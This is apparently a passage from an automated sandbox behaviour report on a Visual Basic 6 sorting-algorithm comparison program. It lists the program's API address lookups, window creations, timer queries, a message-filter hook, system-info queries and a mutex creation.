Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x75a7f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x75a7d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarRound, address_out = 0x75a7d155 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Get Address c:\windows\syswow64\sxs.dll function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window (18)
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Create Sorting Algorithm Comparison wndproc_parameter = 0 True 1
Fn
Create RadixSort wndproc_parameter = 0 True 1
Fn
Create MergeSort wndproc_parameter = 0 True 1
Fn
Create QuickSort wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = VBMsoStdCompMgr, index = 0, new_long = 246096028 False 1
Fn
Keyboard (1)
Operation Additional Information Success Count Logfile
Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
System (852)
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 21
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 17
Fn
Get Time type = Ticks, time = 273922 True 1
Fn
Get Time type = Ticks, time = 273937 True 1
Fn
Get Time type = Ticks, time = 273968 True 5
Fn
Get Time type = Ticks, time = 273984 True 5
Fn
Get Time type = Ticks, time = 274000 True 5
Fn
Get Time type = Ticks, time = 274031 True 6
Fn
Get Time type = Ticks, time = 274046 True 9
Fn
Get Time type = Ticks, time = 274062 True 5
Fn
Get Time type = Ticks, time = 274078 True 5
Fn
Get Time type = Ticks, time = 274093 True 5
Fn
Get Time type = Ticks, time = 274109 True 10
Fn
Get Time type = Ticks, time = 274124 True 5
Fn
Get Time type = Ticks, time = 274140 True 5
Fn
Get Time type = Ticks, time = 274156 True 5
Fn
Get Time type = Ticks, time = 274171 True 5
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 7
Fn
Get Time type = Ticks, time = 274187 True 5
Fn
Get Time type = Ticks, time = 274202 True 10
Fn
Get Time type = Ticks, time = 274218 True 5
Fn
Get Time type = Ticks, time = 274234 True 5
Fn
Get Time type = Ticks, time = 274249 True 5
Fn
Get Time type = Ticks, time = 274265 True 25
Fn
Get Time type = Ticks, time = 274280 True 35
Fn
Get Time type = Ticks, time = 274296 True 40
Fn
Get Time type = Ticks, time = 274312 True 40
Fn
Get Time type = Ticks, time = 274327 True 35
Fn
Get Time type = Ticks, time = 274343 True 35
Fn
Get Time type = Ticks, time = 274358 True 40
Fn
Get Time type = Ticks, time = 274374 True 40
Fn
Get Time type = Ticks, time = 274390 True 40
Fn
Get Time type = Ticks, time = 274405 True 26
Fn
Get Time type = Ticks, time = 274421 True 19
Fn
Get Time type = Ticks, time = 274436 True 40
Fn
Get Time type = Ticks, time = 274452 True 40
Fn
Get Time type = Ticks, time = 274468 True 39
Fn
Get Time type = Ticks, time = 274483 True 37
Fn
Get Time type = Ticks, time = 274499 True 39
Fn
Get Time type = Ticks, time = 274514 True 40
Fn
Get Time type = Ticks, time = 274530 True 25
Fn
Get Time type = Ticks, time = 274546 True 16
Fn
Get Time type = Ticks, time = 274561 True 16
Fn
Get Time type = Ticks, time = 274577 True 16
Fn
Get Time type = Ticks, time = 274592 True 10
Fn
Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
Operation Additional Information Success Count Logfile
Create - True 1
Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Function Logfile